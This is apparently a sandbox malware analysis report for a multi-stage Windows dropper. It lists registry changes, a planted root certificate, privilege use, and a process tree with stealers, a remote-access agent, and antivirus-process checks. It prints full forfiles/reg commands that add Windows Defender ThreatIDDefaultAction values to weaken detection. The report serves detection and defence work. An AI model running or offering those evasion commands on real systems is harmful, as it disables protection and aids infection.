\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" VMfZdiW.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry MeshAgent.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer VMfZdiW.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\SlowContextMenuEntries = fb9a790967add111abcd00c04fc30936fa0000006024b221ea3a6910a2dc08002b30309dac000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 VMfZdiW.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "3" Install.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 RegAsm.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 RegAsm.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 660 schtasks.exe 5640 schtasks.exe 2960 schtasks.exe 5368 schtasks.exe 2156 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2560 64c7443ad4c3ebfb90a246256618a16b9ddb36c43ff45bc86408823c5c6ff808.exe 2560 64c7443ad4c3ebfb90a246256618a16b9ddb36c43ff45bc86408823c5c6ff808.exe 3880 axplong.exe 3880 axplong.exe 2524 D9qjU3T0tH.exe 2524 D9qjU3T0tH.exe 4556 RegAsm.exe 4556 RegAsm.exe 4556 RegAsm.exe 4556 RegAsm.exe 2300 stealc_default2.exe 2300 stealc_default2.exe 4556 RegAsm.exe 4556 RegAsm.exe 4368 M4ceNWFoxe.exe 4368 M4ceNWFoxe.exe 4368 M4ceNWFoxe.exe 4368 M4ceNWFoxe.exe 4368 M4ceNWFoxe.exe 4368 M4ceNWFoxe.exe 2988 penis.exe 2988 penis.exe 2300 stealc_default2.exe 2300 stealc_default2.exe 4408 bundle.exe 4408 bundle.exe 2188 powershell.exe 2188 powershell.exe 4428 Waters.pif 4428 Waters.pif 4428 Waters.pif 4428 Waters.pif 4428 Waters.pif 4428 Waters.pif 4428 Waters.pif 4428 Waters.pif 2188 powershell.exe 4428 Waters.pif 4428 Waters.pif 4036 axplong.exe 4036 axplong.exe 4428 Waters.pif 4428 Waters.pif 4428 Waters.pif 4428 Waters.pif 4428 Waters.pif 4428 Waters.pif 4428 Waters.pif 4428 Waters.pif 4428 Waters.pif 4428 Waters.pif 4428 Waters.pif 4428 Waters.pif 4428 Waters.pif 4428 Waters.pif 4428 Waters.pif 4428 Waters.pif 4428 Waters.pif 4428 Waters.pif 4428 Waters.pif 4428 Waters.pif 4428 Waters.pif 4428 Waters.pif 4428 Waters.pif -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs
pid Process 2756 chrome.exe 2756 chrome.exe 2756 chrome.exe 2756 chrome.exe 2756 chrome.exe 2756 chrome.exe 2756 chrome.exe 2756 chrome.exe 2756 chrome.exe 2756 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2524 D9qjU3T0tH.exe Token: SeBackupPrivilege 2524 D9qjU3T0tH.exe Token: SeSecurityPrivilege 2524 D9qjU3T0tH.exe Token: SeSecurityPrivilege 2524 D9qjU3T0tH.exe Token: SeSecurityPrivilege 2524 D9qjU3T0tH.exe Token: SeSecurityPrivilege 2524 D9qjU3T0tH.exe Token: SeDebugPrivilege 4556 RegAsm.exe Token: SeDebugPrivilege 4368 M4ceNWFoxe.exe Token: SeDebugPrivilege 2988 penis.exe Token: SeBackupPrivilege 2988 penis.exe Token: SeSecurityPrivilege 2988 penis.exe Token: SeSecurityPrivilege 2988 penis.exe Token: SeSecurityPrivilege 2988 penis.exe Token: SeSecurityPrivilege 2988 penis.exe Token: SeDebugPrivilege 4408 bundle.exe Token: SeDebugPrivilege 3120 tasklist.exe Token: SeDebugPrivilege 4084 tasklist.exe Token: SeDebugPrivilege 2188 powershell.exe Token: SeDebugPrivilege 2936 acentric.exe Token: SeDebugPrivilege 4572 RegAsm.exe Token: SeDebugPrivilege 3288 powershell.exe Token: SeIncreaseQuotaPrivilege 4748 WMIC.exe Token: SeSecurityPrivilege 4748 WMIC.exe Token: SeTakeOwnershipPrivilege 4748 WMIC.exe Token: SeLoadDriverPrivilege 4748 WMIC.exe Token: SeSystemProfilePrivilege 4748 WMIC.exe Token: SeSystemtimePrivilege 4748 WMIC.exe Token: SeProfSingleProcessPrivilege 4748 WMIC.exe Token: SeIncBasePriorityPrivilege 4748 WMIC.exe Token: SeCreatePagefilePrivilege 4748 WMIC.exe Token: SeBackupPrivilege 4748 WMIC.exe Token: SeRestorePrivilege 4748 WMIC.exe Token: SeShutdownPrivilege 4748 WMIC.exe Token: SeDebugPrivilege 4748 WMIC.exe Token: SeSystemEnvironmentPrivilege 4748 WMIC.exe Token: SeRemoteShutdownPrivilege 4748 WMIC.exe Token: SeUndockPrivilege 4748 WMIC.exe Token: SeManageVolumePrivilege 4748 WMIC.exe Token: 33 4748 WMIC.exe Token: 34 4748 WMIC.exe Token: 35 4748 WMIC.exe Token: 36 4748 WMIC.exe Token: SeIncreaseQuotaPrivilege 4748 WMIC.exe Token: SeSecurityPrivilege 4748 WMIC.exe Token: SeTakeOwnershipPrivilege 4748 WMIC.exe Token: SeLoadDriverPrivilege 4748 WMIC.exe Token: SeSystemProfilePrivilege 4748 WMIC.exe Token: SeSystemtimePrivilege 4748 WMIC.exe Token: SeProfSingleProcessPrivilege 4748 WMIC.exe Token: SeIncBasePriorityPrivilege 4748 WMIC.exe Token: SeCreatePagefilePrivilege 4748 WMIC.exe Token: SeBackupPrivilege 4748 WMIC.exe Token: SeRestorePrivilege 4748 WMIC.exe Token: SeShutdownPrivilege 4748 WMIC.exe Token: SeDebugPrivilege 4748 WMIC.exe Token: SeSystemEnvironmentPrivilege 4748 WMIC.exe Token: SeRemoteShutdownPrivilege 4748 WMIC.exe Token: SeUndockPrivilege 4748 WMIC.exe Token: SeManageVolumePrivilege 4748 WMIC.exe Token: 33 4748 WMIC.exe Token: 34 4748 WMIC.exe Token: 35 4748 WMIC.exe Token: 36 4748 WMIC.exe Token: SeRestorePrivilege 1652 7zG.exe -
Suspicious use of FindShellTrayWindow 32 IoCs
pid Process 4428 Waters.pif 4428 Waters.pif 4428 Waters.pif 1652 7zG.exe 2756 chrome.exe 2756 chrome.exe 2756 chrome.exe 2756 chrome.exe 2756 chrome.exe 2756 chrome.exe 2756 chrome.exe 2756 chrome.exe 2756 chrome.exe 2756 chrome.exe 2756 chrome.exe 2756 chrome.exe 2756 chrome.exe 2756 chrome.exe 2756 chrome.exe 2756 chrome.exe 2756 chrome.exe 2756 chrome.exe 2756 chrome.exe 2756 chrome.exe 2756 chrome.exe 2756 chrome.exe 2756 chrome.exe 2756 chrome.exe 2756 chrome.exe 2756 chrome.exe 2756 chrome.exe 2756 chrome.exe -
Suspicious use of SendNotifyMessage 29 IoCs
pid Process 4428 Waters.pif 4428 Waters.pif 4428 Waters.pif 2756 chrome.exe 2756 chrome.exe 2756 chrome.exe 2756 chrome.exe 2756 chrome.exe 2756 chrome.exe 2756 chrome.exe 2756 chrome.exe 2756 chrome.exe 2756 chrome.exe 2756 chrome.exe 2756 chrome.exe 2756 chrome.exe 2756 chrome.exe 2756 chrome.exe 2756 chrome.exe 2756 chrome.exe 2756 chrome.exe 2756 chrome.exe 2756 chrome.exe 2756 chrome.exe 2756 chrome.exe 2756 chrome.exe 2756 chrome.exe 2756 chrome.exe 2756 chrome.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2560 wrote to memory of 3880 2560 64c7443ad4c3ebfb90a246256618a16b9ddb36c43ff45bc86408823c5c6ff808.exe 82 PID 2560 wrote to memory of 3880 2560 64c7443ad4c3ebfb90a246256618a16b9ddb36c43ff45bc86408823c5c6ff808.exe 82 PID 2560 wrote to memory of 3880 2560 64c7443ad4c3ebfb90a246256618a16b9ddb36c43ff45bc86408823c5c6ff808.exe 82 PID 3880 wrote to memory of 380 3880 axplong.exe 86 PID 3880 wrote to memory of 380 3880 axplong.exe 86 PID 3880 wrote to memory of 380 3880 axplong.exe 86 PID 380 wrote to memory of 4556 380 gold.exe 88 PID 380 wrote to memory of 4556 380 gold.exe 88 PID 380 wrote to memory of 4556 380 gold.exe 88 PID 380 wrote to memory of 4556 380 gold.exe 88 PID 380 wrote to memory of 4556 380 gold.exe 88 PID 380 wrote to memory of 4556 380 gold.exe 88 PID 380 wrote to memory of 4556 380 gold.exe 88 PID 380 wrote to memory of 4556 380 gold.exe 88 PID 3880 wrote to memory of 832 3880 axplong.exe 92 PID 3880 wrote to memory of 832 3880 axplong.exe 92 PID 3880 wrote to memory of 832 3880 axplong.exe 92 PID 832 wrote to memory of 2524 832 crypteda.exe 93 PID 832 wrote to memory of 2524 832 crypteda.exe 93 PID 832 wrote to memory of 2524 832 crypteda.exe 93 PID 832 wrote to memory of 4368 832 crypteda.exe 95 PID 832 wrote to memory of 4368 832 crypteda.exe 95 PID 832 wrote to memory of 4368 832 crypteda.exe 95 PID 3880 wrote to memory of 64 3880 axplong.exe 97 PID 3880 wrote to memory of 64 3880 axplong.exe 97 PID 3880 wrote to memory of 64 3880 axplong.exe 97 PID 64 wrote to memory of 400 64 Nework.exe 98 PID 64 wrote to memory of 400 64 Nework.exe 98 PID 64 wrote to memory of 400 64 Nework.exe 98 PID 3880 wrote to memory of 2300 3880 axplong.exe 99 PID 3880 wrote to memory of 2300 3880 axplong.exe 99 PID 3880 wrote to memory of 2300 3880 axplong.exe 99 PID 3880 wrote to memory of 4804 3880 axplong.exe 103 PID 3880 wrote to memory of 4804 3880 axplong.exe 103 PID 3880 wrote to memory of 4804 3880 axplong.exe 103 PID 3880 wrote to memory of 2988 3880 axplong.exe 104 PID 3880 wrote to memory of 2988 3880 axplong.exe 104 PID 3880 wrote to memory of 2988 3880 axplong.exe 104 PID 3880 wrote to memory of 4408 3880 axplong.exe 106 PID 3880 wrote to memory of 4408 3880 axplong.exe 106 PID 3880 wrote to memory of 4408 3880 axplong.exe 106 PID 4804 wrote to memory of 4980 4804 needmoney.exe 108 PID 4804 wrote to memory of 4980 4804 needmoney.exe 108 PID 4804 wrote to memory of 4980 4804 needmoney.exe 108 PID 4804 wrote to memory of 4980 4804 needmoney.exe 108 PID 4804 wrote to memory of 4980 4804 needmoney.exe 108 PID 4804 wrote to memory of 4980 4804 needmoney.exe 108 PID 4804 wrote to memory of 4980 4804 needmoney.exe 108 PID 4804 wrote to memory of 4980 4804 needmoney.exe 108 PID 3880 wrote to memory of 2936 3880 axplong.exe 109 PID 3880 wrote to memory of 2936 3880 axplong.exe 109 PID 3880 wrote to memory of 2936 3880 axplong.exe 109 PID 3880 wrote to memory of 1716 3880 axplong.exe 110 PID 3880 wrote to memory of 1716 3880 axplong.exe 110 PID 3880 wrote to memory of 1716 3880 axplong.exe 110 PID 1716 wrote to memory of 3336 1716 2.exe 112 PID 1716 wrote to memory of 3336 1716 2.exe 112 PID 1716 wrote to memory of 3336 1716 2.exe 112 PID 1716 wrote to memory of 3336 1716 2.exe 112 PID 1716 wrote to memory of 3336 1716 2.exe 112 PID 1716 wrote to memory of 3336 1716 2.exe 112 PID 1716 wrote to memory of 3336 1716 2.exe 112 PID 1716 wrote to memory of 3336 1716 2.exe 112 PID 1716 wrote to memory of 3336 1716 2.exe 112
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3428
-
C:\Users\Admin\AppData\Local\Temp\64c7443ad4c3ebfb90a246256618a16b9ddb36c43ff45bc86408823c5c6ff808.exe"C:\Users\Admin\AppData\Local\Temp\64c7443ad4c3ebfb90a246256618a16b9ddb36c43ff45bc86408823c5c6ff808.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2560 -
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3880 -
C:\Users\Admin\AppData\Local\Temp\1000002001\gold.exe"C:\Users\Admin\AppData\Local\Temp\1000002001\gold.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:380 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"5⤵
- System Location Discovery: System Language Discovery
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4556
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe"C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:832 -
C:\Users\Admin\AppData\Roaming\D9qjU3T0tH.exe"C:\Users\Admin\AppData\Roaming\D9qjU3T0tH.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2524
-
-
C:\Users\Admin\AppData\Roaming\M4ceNWFoxe.exe"C:\Users\Admin\AppData\Roaming\M4ceNWFoxe.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4368
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000005001\Nework.exe"C:\Users\Admin\AppData\Local\Temp\1000005001\Nework.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:64 -
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe"C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:400
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe"C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:2300
-
-
C:\Users\Admin\AppData\Local\Temp\1000191001\needmoney.exe"C:\Users\Admin\AppData\Local\Temp\1000191001\needmoney.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4804 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exeC:\Users\Admin\AppData\Local\Temp\svchost015.exe5⤵
- Executes dropped EXE
PID:4980
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000254001\penis.exe"C:\Users\Admin\AppData\Local\Temp\1000254001\penis.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2988
-
-
C:\Users\Admin\AppData\Local\Temp\1000259001\bundle.exe"C:\Users\Admin\AppData\Local\Temp\1000259001\bundle.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4408
-
-
C:\Users\Admin\AppData\Local\Temp\1000284001\acentric.exe"C:\Users\Admin\AppData\Local\Temp\1000284001\acentric.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
PID:2936
-
-
C:\Users\Admin\AppData\Local\Temp\1000285001\2.exe"C:\Users\Admin\AppData\Local\Temp\1000285001\2.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1716 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"5⤵PID:3336
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3336 -s 4126⤵
- Program crash
PID:3684
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000287001\splwow64.exe"C:\Users\Admin\AppData\Local\Temp\1000287001\splwow64.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:1988 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c move Emotions Emotions.bat & Emotions.bat5⤵PID:3636
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3120
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa opssvc"6⤵PID:4904
-
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4084
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"6⤵
- System Location Discovery: System Language Discovery
PID:452
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 6076986⤵
- System Location Discovery: System Language Discovery
PID:2012
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "MaskBathroomCompositionInjection" Participants6⤵PID:3128
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Navy + ..\Temperature + ..\Streaming + ..\Ashley + ..\Ensures + ..\Language + ..\Viruses + ..\Bet + ..\Fla + ..\Asbestos + ..\Width Q6⤵
- System Location Discovery: System Language Discovery
PID:532
-
-
C:\Users\Admin\AppData\Local\Temp\607698\Waters.pifWaters.pif Q6⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4428 -
C:\Users\Admin\AppData\Local\Temp\1000404101\Installeraus.exe"C:\Users\Admin\AppData\Local\Temp\1000404101\Installeraus.exe"7⤵
- Executes dropped EXE
PID:660 -
C:\Users\Admin\AppData\Roaming\MSIX\meshagent32-group.exe"C:\Users\Admin\AppData\Roaming\MSIX\meshagent32-group.exe" -fullinstall8⤵
- Sets service image path in registry
- Executes dropped EXE
- Drops file in Program Files directory
PID:412
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000418001\66ed8969a40d8_15_20240920173635.exe"C:\Users\Admin\AppData\Local\Temp\1000418001\66ed8969a40d8_15_20240920173635.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5916 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"8⤵PID:5240
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000419001\channel3.exe"C:\Users\Admin\AppData\Local\Temp\1000419001\channel3.exe"7⤵
- Executes dropped EXE
- Checks processor information in registry
PID:5464
-
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 56⤵PID:1592
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000290001\crypted.exe"C:\Users\Admin\AppData\Local\Temp\1000290001\crypted.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2136 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"5⤵
- Suspicious use of AdjustPrivilegeToken
PID:4572
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000293001\385121.exe"C:\Users\Admin\AppData\Local\Temp\1000293001\385121.exe"4⤵
- Executes dropped EXE
PID:3984 -
C:\Users\Admin\AppData\Local\Temp\7zSF935.tmp\Install.exe.\Install.exe5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:888 -
C:\Users\Admin\AppData\Local\Temp\7zSFD4C.tmp\Install.exe.\Install.exe /WCodidzc "385121" /S6⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:5088 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"7⤵PID:4740
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"8⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:3084 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 69⤵
- System Location Discovery: System Language Discovery
PID:756 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 610⤵
- System Location Discovery: System Language Discovery
PID:2360
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"8⤵
- Indirect Command Execution
PID:1520 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 69⤵PID:2600
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 610⤵PID:2808
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"8⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:2920 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 69⤵PID:1052
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 610⤵PID:3756
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"8⤵
- Indirect Command Execution
PID:4308 -
